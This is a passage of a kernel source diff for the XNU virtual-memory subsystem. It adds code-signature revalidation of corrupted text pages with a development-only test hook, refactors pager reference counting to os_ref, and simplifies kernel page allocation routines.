vaddr, + vm_object_t *ret_object, + vm_object_offset_t *ret_offset, + vm_page_t *ret_page) +{ + vm_object_t object; + vm_object_offset_t offset; + vm_page_t page; + kern_return_t kr = KERN_SUCCESS; + uint8_t object_lock_type = OBJECT_LOCK_EXCLUSIVE; + vm_map_version_t version; + boolean_t wired; + struct vm_object_fault_info fault_info = {}; + vm_map_t real_map = NULL; + vm_prot_t prot; + vm_object_t shadow; + + /* + * Find the object/offset for the given location/map. + * Note this returns with the object locked. + */ +restart: + vm_map_lock_read(map); + object = VM_OBJECT_NULL; /* in case we come around the restart path */ + kr = vm_map_lookup_locked(&map, vaddr, VM_PROT_READ, + object_lock_type, &version, &object, &offset, &prot, &wired, + &fault_info, &real_map, NULL); + vm_map_unlock_read(map); + if (real_map != NULL && real_map != map) { + vm_map_unlock(real_map); + } + + /* + * If there's no mapping here, or if we fail because the page + * wasn't mapped executable, we can ignore this. + */ + if (kr != KERN_SUCCESS || + object == NULL || + !(prot & VM_PROT_EXECUTE)) { + kr = KERN_FAILURE; + goto done; + } + + /* + * Chase down any shadow chains to find the actual page. + */ + for (;;) { + /* + * See if the page is on the current object. + */ + page = vm_page_lookup(object, vm_object_trunc_page(offset)); + if (page != NULL) { + /* restart the lookup */ + if (page->vmp_restart) { + vm_object_unlock(object); + goto restart; + } + + /* + * If this page is busy, we need to wait for it. + */ + if (page->vmp_busy) { + PAGE_SLEEP(object, page, TRUE); + vm_object_unlock(object); + goto restart; + } + break; + } + + /* + * If the object doesn't have the page and + * has no shadow, then we can quit. + */ + shadow = object->shadow; + if (shadow == NULL) { + kr = KERN_FAILURE; + goto done; + } + + /* + * Move to the next object + */ + offset += object->vo_shadow_offset; + vm_object_lock(shadow); + vm_object_unlock(object); + object = shadow; + shadow = VM_OBJECT_NULL; + } + *ret_object = object; + *ret_offset = vm_object_trunc_page(offset); + *ret_page = page; + +done: + if (kr != KERN_SUCCESS && object != NULL) { + vm_object_unlock(object); + } + return kr; +} + +/* + * Check if a page is wired, needs extra locking. + */ +static bool +is_page_wired(vm_page_t page) +{ + bool result; + vm_page_lock_queues(); + result = VM_PAGE_WIRED(page); + vm_page_unlock_queues(); + return result; +} + +/* + * A fatal process error has occurred in the given task. + * Recheck the code signing of the text page at the given + * address to check for a text page corruption. + * + * Returns KERN_FAILURE if a page was found to be corrupt + * by failing to match its code signature. KERN_SUCCESS + * means the page is either valid or we don't have the + * information to say it's corrupt. + */ +kern_return_t +revalidate_text_page(task_t task, vm_map_offset_t code_addr) +{ + kern_return_t kr; + vm_map_t map; + vm_object_t object = NULL; + vm_object_offset_t offset; + vm_page_t page = NULL; + struct vnode *vnode; + bool do_invalidate = false; + uint64_t *diagnose_buffer = NULL; + + map = task->map; + if (task->map == NULL) { + return KERN_SUCCESS; + } + + kr = vmtc_revalidate_lookup(map, code_addr, &object, &offset, &page); + if (kr != KERN_SUCCESS) { + goto done; + } + + /* + * The object needs to have a pager. + */ + if (object->pager == NULL) { + goto done; + } + + /* + * Needs to be a vnode backed page to have a signature. + */ + vnode = vnode_pager_lookup_vnode(object->pager); + if (vnode == NULL) { + goto done; + } + + /* + * Object checks to see if we should proceed. + */ + if (!object->code_signed || /* no code signature to check */ + object->internal || /* internal objects aren't signed */ + object->terminating || /* the object and its pages are already going away */ + !object->pager_ready) { /* this should happen, but check shouldn't hurt */ + goto done; + } + + /* + * Check the code signature of the page in question. + */ + vm_page_map_and_validate_cs(object, page); + + /* + * At this point: + * vmp_cs_validated |= validated (set if a code signature exists) + * vmp_cs_tainted |= tainted (set if code signature violation) + * vmp_cs_nx |= nx; ?? + * + * if vmp_pmapped then have to pmap_disconnect.. + * other flags to check on object or page? + */ + if (page->vmp_cs_tainted != VMP_CS_ALL_FALSE) { +#if DEBUG || DEVELOPMENT + /* + * On development builds, a boot-arg can be used to cause + * a panic, instead of a quiet repair. + */ + if (vmtc_panic_instead) { + panic("Text page corruption detected: vm_page_t 0x%llx\n", (long long)(uintptr_t)page); + } +#endif /* DEBUG || DEVELOPMENT */ + + /* + * We're going to invalidate this page. Mark it as busy so we can + * drop the object lock and use copyin() to save its contents. + */ + do_invalidate = true; + assert(!page->vmp_busy); + page->vmp_busy = TRUE; + vm_object_unlock(object); + diagnose_buffer = vmtc_text_page_diagnose_setup(code_addr); + } + +done: + if (do_invalidate) { + vm_object_lock(object); + assert(page->vmp_busy); + assert(VM_PAGE_OBJECT(page) == object); /* Since the page was busy, this shouldn't change */ + assert(page->vmp_offset == offset); + PAGE_WAKEUP_DONE(page); /* make no longer busy */ + + /* + * Invalidate, i.e. toss, the corrupted page. + */ + if (!page->vmp_cleaning && + !page->vmp_laundry && + !page->vmp_fictitious && + !page->vmp_precious && + !page->vmp_absent && + !page->vmp_error && + !page->vmp_dirty && + !is_page_wired(page)) { + if (page->vmp_pmapped) { + int refmod = pmap_disconnect(VM_PAGE_GET_PHYS_PAGE(page)); + if (refmod & VM_MEM_MODIFIED) { + SET_PAGE_DIRTY(page, FALSE); + } + if (refmod & VM_MEM_REFERENCED) { + page->vmp_reference = TRUE; + } + } + /* If the page seems intentionally modified, don't trash it. */ + if (!page->vmp_dirty) { + VM_PAGE_FREE(page); + } else { + (void)OSAddAtomic(1, &vmtc_not_eligible); + } + } else { + (void)OSAddAtomic(1, &vmtc_not_eligible); + } + vm_object_unlock(object); + + /* + * Now try to diagnose the type of failure by faulting + * in a new copy and diff'ing it with what we saved. + */ + if (diagnose_buffer) { + vmtc_text_page_diagnose(code_addr, diagnose_buffer); + } + return KERN_FAILURE; + } + + if (object != NULL) { + vm_object_unlock(object); + } + return KERN_SUCCESS; +} + +#if DEBUG || DEVELOPMENT +/* + * For implementing unit tests - ask the pmap to corrupt a text page. + * We have to find the page, to get the physical address, then invoke + * the pmap. + */ +extern kern_return_t vm_corrupt_text_addr(uintptr_t); + +kern_return_t +vm_corrupt_text_addr(uintptr_t va) +{ + task_t task = current_task(); + vm_map_t map; + kern_return_t kr = KERN_SUCCESS; + vm_object_t object = VM_OBJECT_NULL; + vm_object_offset_t offset; + vm_page_t page = NULL; + pmap_paddr_t pa; + + map = task->map; + if (task->map == NULL) { + printf("corrupt_text_addr: no map\n"); + return KERN_FAILURE; + } + + kr = vmtc_revalidate_lookup(map, (vm_map_offset_t)va, &object, &offset, &page); + if (kr != KERN_SUCCESS) { + printf("corrupt_text_addr: page lookup failed\n"); + return kr; + } + /* get the physical address to use */ + pa = ptoa(VM_PAGE_GET_PHYS_PAGE(page)) + (va - vm_object_trunc_page(va)); + + /* + * Check we have something we can work with. + * Due to racing with pageout as we enter the sysctl, + * it's theoretically possible to have the page disappear, just + * before the lookup. + * + * That's highly likely to happen often. I've filed a radar 72857482 + * to bubble up the error here to the sysctl result and have the + * test not FAIL in that case. + */ + if (page->vmp_busy) { + printf("corrupt_text_addr: vmp_busy\n"); + kr = KERN_FAILURE; + } + if (page->vmp_cleaning) { + printf("corrupt_text_addr: vmp_cleaning\n"); + kr = KERN_FAILURE; + } + if (page->vmp_laundry) { + printf("corrupt_text_addr: vmp_cleaning\n"); + kr = KERN_FAILURE; + } + if (page->vmp_fictitious) { + printf("corrupt_text_addr: vmp_fictitious\n"); + kr = KERN_FAILURE; + } + if (page->vmp_precious) { + printf("corrupt_text_addr: vmp_precious\n"); + kr = KERN_FAILURE; + } + if (page->vmp_absent) { + printf("corrupt_text_addr: vmp_absent\n"); + kr = KERN_FAILURE; + } + if (page->vmp_error) { + printf("corrupt_text_addr: vmp_error\n"); + kr = KERN_FAILURE; + } + if (page->vmp_dirty) { + printf("corrupt_text_addr: vmp_dirty\n"); + kr = KERN_FAILURE; + } + if (is_page_wired(page)) { + printf("corrupt_text_addr: wired\n"); + kr = KERN_FAILURE; + } + if (!page->vmp_pmapped) { + printf("corrupt_text_addr: !vmp_pmapped\n"); + kr = KERN_FAILURE; + } + + if (kr == KERN_SUCCESS) { + printf("corrupt_text_addr: using physaddr 0x%llx\n", (long long)pa); + kr = pmap_test_text_corruption(pa); + if (kr != KERN_SUCCESS) { + printf("corrupt_text_addr: pmap error %d\n", kr); + } + } else { + printf("corrupt_text_addr: object %p\n", object); + printf("corrupt_text_addr: offset 0x%llx\n", (uint64_t)offset); + printf("corrupt_text_addr: va 0x%llx\n", (uint64_t)va); + printf("corrupt_text_addr: vm_object_trunc_page(va) 0x%llx\n", (uint64_t)vm_object_trunc_page(va)); + printf("corrupt_text_addr: vm_page_t %p\n", page); + printf("corrupt_text_addr: ptoa(PHYS_PAGE) 0x%llx\n", (uint64_t)ptoa(VM_PAGE_GET_PHYS_PAGE(page))); + printf("corrupt_text_addr: using physaddr 0x%llx\n", (uint64_t)pa); + } + + if (object != VM_OBJECT_NULL) { + vm_object_unlock(object); + } + return kr; +} +#endif /* DEBUG || DEVELOPMENT */ diff --git a/osfmk/vm/vm_fourk_pager.c b/osfmk/vm/vm_fourk_pager.c index 73bfa3a24..d815d85a3 100644 --- a/osfmk/vm/vm_fourk_pager.c +++ b/osfmk/vm/vm_fourk_pager.c @@ -149,9 +149,13 @@ typedef struct fourk_pager { /* pager-specific data */ queue_chain_t pager_queue; /* next & prev pagers */ - unsigned int ref_count; /* reference count */ - int is_ready; /* is this pager ready ? */ - int is_mapped; /* is this mem_obj mapped ? */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define fourk_pgr_hdr_ref fourk_pgr_hdr.mo_ref +#else + os_ref_atomic_t fourk_pgr_hdr_ref; +#endif + bool is_ready; /* is this pager ready ? */ + bool is_mapped; /* is this mem_obj mapped ? */ struct fourk_pager_backing slots[FOURK_PAGER_SLOTS]; /* backing for each * 4K-chunk */ } *fourk_pager_t; @@ -322,8 +326,7 @@ fourk_pager_reference( pager = fourk_pager_lookup(mem_obj); lck_mtx_lock(&fourk_pager_lock); - assert(pager->ref_count > 0); - pager->ref_count++; + os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); lck_mtx_unlock(&fourk_pager_lock); } @@ -401,6 +404,7 @@ fourk_pager_deallocate_internal( { boolean_t needs_trimming; int count_unmapped; + os_ref_count_t ref_count; if (!locked) { lck_mtx_lock(&fourk_pager_lock); @@ -416,9 +420,9 @@ fourk_pager_deallocate_internal( } /* drop a reference on this pager */ - pager->ref_count--; + ref_count = os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); - if (pager->ref_count == 1) { + if (ref_count == 1) { /* * Only the "named" reference is left, which means that * no one is really holding on to this pager anymore. @@ -428,7 +432,7 @@ fourk_pager_deallocate_internal( /* the pager is all ours: no need for the lock now */ lck_mtx_unlock(&fourk_pager_lock); fourk_pager_terminate_internal(pager); - } else if (pager->ref_count == 0) { + } else if (ref_count == 0) { /* * Dropped the existence reference; the memory object has * been terminated. Do some final cleanup and release the @@ -519,7 +523,7 @@ fourk_pager_map( lck_mtx_lock(&fourk_pager_lock); assert(pager->is_ready); - assert(pager->ref_count > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); /* pager is alive */ if (pager->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -527,7 +531,7 @@ fourk_pager_map( * are removed. */ pager->is_mapped = TRUE; - pager->ref_count++; + os_ref_retain_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); fourk_pager_count_mapped++; } lck_mtx_unlock(&fourk_pager_lock); @@ -586,7 +590,7 @@ fourk_pager_lookup( assert(mem_obj->mo_pager_ops == &fourk_pager_ops); pager = (fourk_pager_t) mem_obj; - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); return pager; } @@ -616,7 +620,7 @@ fourk_pager_trim(void) prev_pager = (fourk_pager_t) queue_prev(&pager->pager_queue); - if (pager->ref_count == 2 && + if (os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2 && pager->is_ready && !pager->is_mapped) { /* this pager can be trimmed */ @@ -652,13 +656,13 @@ fourk_pager_trim(void) pager_queue); pager->pager_queue.next = NULL; pager->pager_queue.prev = NULL; - assert(pager->ref_count == 2); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) == 2); /* * We can't call deallocate_internal() because the pager * has already been dequeued, but we still need to remove * a reference. */ - pager->ref_count--; + (void)os_ref_release_locked_raw(&pager->fourk_pgr_hdr_ref, NULL); fourk_pager_terminate_internal(pager); } } @@ -680,7 +684,7 @@ fourk_pager_to_vm_object( return VM_OBJECT_NULL; } - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL); object = memory_object_control_to_vm_object(pager->fourk_pgr_hdr.mo_control); assert(object != VM_OBJECT_NULL); @@ -718,8 +722,8 @@ fourk_pager_create(void) pager->fourk_pgr_hdr.mo_pager_ops = &fourk_pager_ops; pager->fourk_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; - pager->ref_count = 2; /* existence + setup reference */ - pager->is_ready = FALSE;/* not ready until it has a "name" */ + os_ref_init_count_raw(&pager->fourk_pgr_hdr_ref, NULL, 2); /* existence + setup reference */ + pager->is_ready = FALSE; /* not ready until it has a "name" */ pager->is_mapped = FALSE; for (i = 0; i < FOURK_PAGER_SLOTS; i++) { @@ -792,7 +796,7 @@ fourk_pager_data_request( pager = fourk_pager_lookup(mem_obj); assert(pager->is_ready); - assert(pager->ref_count > 1); /* pager is alive and mapped */ + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 1); /* pager is alive and mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("fourk_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -821,7 +825,7 @@ fourk_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); #if __x86_64__ || __arm__ || __arm64__ @@ -1289,7 +1293,7 @@ fourk_pager_populate( return KERN_INVALID_ARGUMENT; } - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->fourk_pgr_hdr_ref) > 0); assert(pager->fourk_pgr_hdr.mo_control != MEMORY_OBJECT_CONTROL_NULL); if (index < 0 || index > FOURK_PAGER_SLOTS) { diff --git a/osfmk/vm/vm_init.c b/osfmk/vm/vm_init.c index 8bd9c2378..11ef72463 100644 --- a/osfmk/vm/vm_init.c +++ b/osfmk/vm/vm_init.c @@ -87,9 +87,6 @@ const vm_offset_t vm_max_kernel_address = VM_MAX_KERNEL_ADDRESS; TUNABLE(bool, iokit_iomd_setownership_enabled, "iokit_iomd_setownership_enabled", true); -vm_offset_t kmapoff_kaddr; -unsigned int kmapoff_pgcnt; - static inline void vm_mem_bootstrap_log(const char *message) { @@ -105,7 +102,7 @@ __startup_func void vm_mem_bootstrap(void) { - vm_offset_t start, end; + vm_offset_t start, end, kmapoff_kaddr; /* * Initializes resident memory structures. @@ -125,6 +122,8 @@ vm_mem_bootstrap(void) vm_mem_bootstrap_log("vm_object_bootstrap"); vm_object_bootstrap(); + vm_retire_boot_pages(); + kernel_startup_initialize_upto(STARTUP_SUB_VM_KERNEL); vm_mem_bootstrap_log("vm_map_init"); @@ -144,10 +143,11 @@ vm_mem_bootstrap(void) * pointer packing schemes using KERNEL_PMAP_HEAP_RANGE_START as a base * do not admit this address to be part of any zone submap. */ - kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */ - if (vm_allocate_kernel(kernel_map, &kmapoff_kaddr, - kmapoff_pgcnt * PAGE_SIZE_64, VM_FLAGS_ANYWHERE, VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) { - panic("cannot vm_allocate %u kernel_map pages", kmapoff_pgcnt); + uint32_t kmapoff_pgcnt = (early_random() & 0x1ff) + 1; /* 9 bits */ + if (kernel_memory_allocate(kernel_map, &kmapoff_kaddr, + ptoa(kmapoff_pgcnt), 0, KMA_KOBJECT | KMA_PERMANENT | KMA_VAONLY, + VM_KERN_MEMORY_OSFMK) != KERN_SUCCESS) { + panic("cannot kernel_memory_allocate %u pages", kmapoff_pgcnt); } vm_mem_bootstrap_log("pmap_init"); diff --git a/osfmk/vm/vm_kern.c b/osfmk/vm/vm_kern.c index 8abf0275c..51dd4fe46 100644 --- a/osfmk/vm/vm_kern.c +++ b/osfmk/vm/vm_kern.c @@ -111,7 +111,7 @@ kmem_alloc_contig( vm_offset_t mask, ppnum_t max_pnum, ppnum_t pnum_mask, - int flags, + kma_flags_t flags, vm_tag_t tag) { vm_object_t object; @@ -252,8 +252,8 @@ kernel_memory_allocate( vm_offset_t *addrp, vm_size_t size, vm_offset_t mask, - int flags, - vm_tag_t tag) + kma_flags_t flags, + vm_tag_t tag) { vm_object_t object; vm_object_offset_t offset; @@ -268,14 +268,9 @@ kernel_memory_allocate( vm_page_t wired_page_list = NULL; int guard_page_count = 0; int wired_page_count = 0; - int page_grab_count = 0; - int i; int vm_alloc_flags; vm_map_kernel_flags_t vmk_flags; vm_prot_t kma_prot; -#if DEVELOPMENT || DEBUG - task_t task = current_task(); -#endif /* DEVELOPMENT || DEBUG */ if (startup_phase < STARTUP_SUB_KMEM) { panic("kernel_memory_allocate: VM is not ready"); @@ -349,64 +344,25 @@ kernel_memory_allocate( assert(wired_page_count * PAGE_SIZE_64 == fill_size); #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0); + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, + size, 0, 0, 0); #endif - for (i = 0; i < guard_page_count; i++) { - for (;;) { - mem = vm_page_grab_guard(); - - if (mem != VM_PAGE_NULL) { - break; - } - if (flags & KMA_NOPAGEWAIT) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - vm_page_more_fictitious(); + for (int i = 0; i < guard_page_count; i++) { + mem = vm_page_grab_guard((flags & KMA_NOPAGEWAIT) == 0); + if (mem == VM_PAGE_NULL) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; } mem->vmp_snext = guard_page_list; guard_page_list = mem; } if (!(flags & (KMA_VAONLY | KMA_PAGEABLE))) { - for (i = 0; i < wired_page_count; i++) { - for (;;) { - if (flags & KMA_LOMEM) { - mem = vm_page_grablo(); - } else { - mem = vm_page_grab(); - } - - if (mem != VM_PAGE_NULL) { - break; - } - - if (flags & KMA_NOPAGEWAIT) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - - /* VM privileged threads should have waited in vm_page_grab() and not get here. */ - assert(!(current_thread()->options & TH_OPT_VMPRIV)); - - uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE; - if (unavailable > max_mem || map_size > (max_mem - unavailable)) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - VM_PAGE_WAIT(); - } - page_grab_count++; - if (KMA_ZERO & flags) { - vm_page_zero_fill(mem); - } - mem->vmp_snext = wired_page_list; - wired_page_list = mem; + kr = vm_page_alloc_list(wired_page_count, flags, + &wired_page_list); + if (kr != KERN_SUCCESS) { + goto out; } } @@ -580,12 +536,9 @@ kernel_memory_allocate( } #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + wired_page_count, 0, 0, 0); #endif - /* * Return the memory, not zeroed. */ @@ -602,141 +555,32 @@ out: } #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL && kr == KERN_SUCCESS) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + wired_page_count, 0, 0, 0); #endif - return kr; } -kern_return_t -kernel_memory_populate( +void +kernel_memory_populate_with_pages( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + vm_page_t page_list, + kma_flags_t flags, vm_tag_t tag) { - vm_object_t object; - vm_object_offset_t offset, pg_offset; - kern_return_t kr, pe_result; - vm_page_t mem; - vm_page_t page_list = NULL; - int page_count = 0; - int page_grab_count = 0; - int i; - -#if DEBUG || DEVELOPMENT - task_t task = current_task(); - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, size, 0, 0, 0); -#endif - - page_count = (int) (size / PAGE_SIZE_64); - - assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT)); + vm_object_t object; + kern_return_t pe_result; + vm_page_t mem; + int page_count = atop_64(size); if (flags & KMA_COMPRESSOR) { - pg_offset = page_count * PAGE_SIZE_64; - - do { - for (;;) { - mem = vm_page_grab(); - - if (mem != VM_PAGE_NULL) { - break; - } - - VM_PAGE_WAIT(); - } - page_grab_count++; - if (KMA_ZERO & flags) { - vm_page_zero_fill(mem); - } - mem->vmp_snext = page_list; - page_list = mem; - - pg_offset -= PAGE_SIZE_64; - - kr = pmap_enter_options(kernel_pmap, - addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem), - VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE, - PMAP_OPTIONS_INTERNAL, NULL); - assert(kr == KERN_SUCCESS); - } while (pg_offset); - - offset = addr; - object = compressor_object; - - vm_object_lock(object); - - for (pg_offset = 0; - pg_offset < size; - pg_offset += PAGE_SIZE_64) { - mem = page_list; - page_list = mem->vmp_snext; - mem->vmp_snext = NULL; - - vm_page_insert(mem, object, offset + pg_offset); - assert(mem->vmp_busy); - - mem->vmp_busy = FALSE; - mem->vmp_pmapped = TRUE; - mem->vmp_wpmapped = TRUE; - mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR; - } - vm_object_unlock(object); - -#if KASAN - if (map == compressor_map) { - kasan_notify_address_nopoison(addr, size); - } else { - kasan_notify_address(addr, size); - } -#endif - -#if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } -#endif - return KERN_SUCCESS; + panic("%s(%p,0x%llx,0x%llx,0x%x): KMA_COMPRESSOR", __func__, + map, (uint64_t) addr, (uint64_t) size, flags); } - for (i = 0; i < page_count; i++) { - for (;;) { - if (flags & KMA_LOMEM) { - mem = vm_page_grablo(); - } else { - mem = vm_page_grab(); - } - - if (mem != VM_PAGE_NULL) { - break; - } - - if (flags & KMA_NOPAGEWAIT) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - if ((flags & KMA_LOMEM) && - (vm_lopage_needed == TRUE)) { - kr = KERN_RESOURCE_SHORTAGE; - goto out; - } - VM_PAGE_WAIT(); - } - page_grab_count++; - if (KMA_ZERO & flags) { - vm_page_zero_fill(mem); - } - mem->vmp_snext = page_list; - page_list = mem; - } if (flags & KMA_KOBJECT) { - offset = addr; object = kernel_object; vm_object_lock(object); @@ -749,16 +593,15 @@ kernel_memory_populate( * take reference on object; * unlock map; */ - panic("kernel_memory_populate(%p,0x%llx,0x%llx,0x%x): " - "!KMA_KOBJECT", + panic("%s(%p,0x%llx,0x%llx,0x%x): !KMA_KOBJECT", __func__, map, (uint64_t) addr, (uint64_t) size, flags); } - for (pg_offset = 0; + for (vm_object_offset_t pg_offset = 0; pg_offset < size; pg_offset += PAGE_SIZE_64) { if (page_list == NULL) { - panic("kernel_memory_populate: page_list == NULL"); + panic("%s: page_list too short", __func__); } mem = page_list; @@ -768,11 +611,11 @@ kernel_memory_populate( assert(mem->vmp_q_state == VM_PAGE_NOT_ON_Q); mem->vmp_q_state = VM_PAGE_IS_WIRED; mem->vmp_wire_count++; - if (__improbable(mem->vmp_wire_count == 0)) { - panic("kernel_memory_populate(%p): wire_count overflow", mem); + if (mem->vmp_wire_count == 0) { + panic("%s(%p): wire_count overflow", __func__, mem); } - vm_page_insert_wired(mem, object, offset + pg_offset, tag); + vm_page_insert_wired(mem, object, addr + pg_offset, tag); mem->vmp_busy = FALSE; mem->vmp_pmapped = TRUE; @@ -799,23 +642,19 @@ kernel_memory_populate( assert(pe_result == KERN_SUCCESS); if (flags & KMA_NOENCRYPT) { - bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE); + __nosan_bzero(CAST_DOWN(void *, (addr + pg_offset)), PAGE_SIZE); pmap_set_noencrypt(VM_PAGE_GET_PHYS_PAGE(mem)); } } + if (page_list) { + panic("%s: page_list too long", __func__); + } vm_object_unlock(object); vm_page_lockspin_queues(); vm_page_wire_count += page_count; vm_page_unlock_queues(); - vm_tag_update_size(tag, ptoa_64(page_count)); - -#if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } -#endif + vm_tag_update_size(tag, size); #if KASAN if (map == compressor_map) { @@ -824,20 +663,106 @@ kernel_memory_populate( kasan_notify_address(addr, size); } #endif - return KERN_SUCCESS; +} -out: - if (page_list) { - vm_page_free_list(page_list, FALSE); - } +kern_return_t +kernel_memory_populate( + vm_map_t map, + vm_offset_t addr, + vm_size_t size, + kma_flags_t flags, + vm_tag_t tag) +{ + vm_object_t object; + vm_object_offset_t offset, pg_offset; + kern_return_t kr = KERN_SUCCESS; + vm_page_t mem; + vm_page_t page_list = NULL; + int page_count = atop_64(size); #if DEBUG || DEVELOPMENT - VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, page_grab_count, 0, 0, 0); - if (task != NULL && kr == KERN_SUCCESS) { - ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); - } + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START, + size, 0, 0, 0); #endif + assert((flags & (KMA_COMPRESSOR | KMA_KOBJECT)) != (KMA_COMPRESSOR | KMA_KOBJECT)); + + if (flags & KMA_COMPRESSOR) { + pg_offset = page_count * PAGE_SIZE_64; + + do { + for (;;) { + mem = vm_page_grab(); + + if (mem != VM_PAGE_NULL) { + break; + } + + VM_PAGE_WAIT(); + } + if (KMA_ZERO & flags) { + vm_page_zero_fill(mem); + } + mem->vmp_snext = page_list; + page_list = mem; + + pg_offset -= PAGE_SIZE_64; + + kr = pmap_enter_options(kernel_pmap, + addr + pg_offset, VM_PAGE_GET_PHYS_PAGE(mem), + VM_PROT_READ | VM_PROT_WRITE, VM_PROT_NONE, 0, TRUE, + PMAP_OPTIONS_INTERNAL, NULL); + assert(kr == KERN_SUCCESS); + } while (pg_offset); + + offset = addr; + object = compressor_object; + + vm_object_lock(object); + + for (pg_offset = 0; + pg_offset < size; + pg_offset += PAGE_SIZE_64) { + mem = page_list; + page_list = mem->vmp_snext; + mem->vmp_snext = NULL; + + vm_page_insert(mem, object, offset + pg_offset); + assert(mem->vmp_busy); + + mem->vmp_busy = FALSE; + mem->vmp_pmapped = TRUE; + mem->vmp_wpmapped = TRUE; + mem->vmp_q_state = VM_PAGE_USED_BY_COMPRESSOR; + } + vm_object_unlock(object); + +#if KASAN + if (map == compressor_map) { + kasan_notify_address_nopoison(addr, size); + } else { + kasan_notify_address(addr, size); + } +#endif + +#if DEBUG || DEVELOPMENT + task_t task = current_task(); + if (task != NULL) { + ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_count); + } +#endif + } else { + kr = vm_page_alloc_list(page_count, flags, &page_list); + if (kr == KERN_SUCCESS) { + kernel_memory_populate_with_pages(map, addr, size, + page_list, flags, tag); + } + } + +#if DEBUG || DEVELOPMENT + VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END, + page_count, 0, 0, 0); +#endif return kr; } @@ -847,7 +772,7 @@ kernel_memory_depopulate( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + kma_flags_t flags, vm_tag_t tag) { vm_object_t object; @@ -956,7 +881,7 @@ kmem_alloc_flags( vm_offset_t *addrp, vm_size_t size, vm_tag_t tag, - int flags) + kma_flags_t flags) { kern_return_t kr = kernel_memory_allocate(map, addrp, size, 0, flags, tag); if (kr == KERN_SUCCESS) { @@ -1596,6 +1521,68 @@ copyoutmap( return kr; } +/* + * Routine: copyoutmap_atomic{32, 64} + * Purpose: + * Like copyoutmap, except that the operation is atomic. + * Takes in value rather than *fromdata pointer. + */ +kern_return_t +copyoutmap_atomic32( + vm_map_t map, + uint32_t value, + vm_map_address_t toaddr) +{ + kern_return_t kr = KERN_SUCCESS; + vm_map_t oldmap; + + if (vm_map_pmap(map) == pmap_kernel()) { + /* assume a correct toaddr */ + *(uint32_t *)toaddr = value; + } else if (current_map() == map) { + if (copyout_atomic32(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + } else { + vm_map_reference(map); + oldmap = vm_map_switch(map); + if (copyout_atomic32(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + 